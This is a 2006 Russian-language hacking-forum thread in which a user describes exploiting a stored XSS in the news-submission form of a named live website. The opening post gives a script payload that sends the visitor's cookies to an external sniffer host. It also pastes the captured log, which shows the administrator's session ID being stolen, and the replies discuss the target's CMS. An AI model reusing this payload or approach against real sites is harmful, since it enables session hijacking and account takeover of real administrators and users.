XSS на whitep.net

Discussion in 'Уязвимости' started by sssssssssssq, 7 Mar 2006.

  1. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Вот нашёл XSS на _http://whitep.net/
    Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей)
    Code:
    <script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script>
    Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе:

    Code:
    Date	07.03.2006 15:02	
    IP 	***********	
    Real Ip	***********	
    Referer	http://whitep.net/modules.php	
    Query	modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1	
    Browser	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50
     
  2. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    хм, наверно это на всех спайзах такое есть, где новости посылать можно...
    помоему там код видно будет еще...
     
  3. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    А чё это за движёк? Всмысле видно? Невидно его, я же только что пробывал.
    P.S зайди в аську, дело есть!
     
  4. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Это ихмо спайз или пхпнюке

    я грил видно =))
    если бы не видно, не сменил бы он так быстро пасс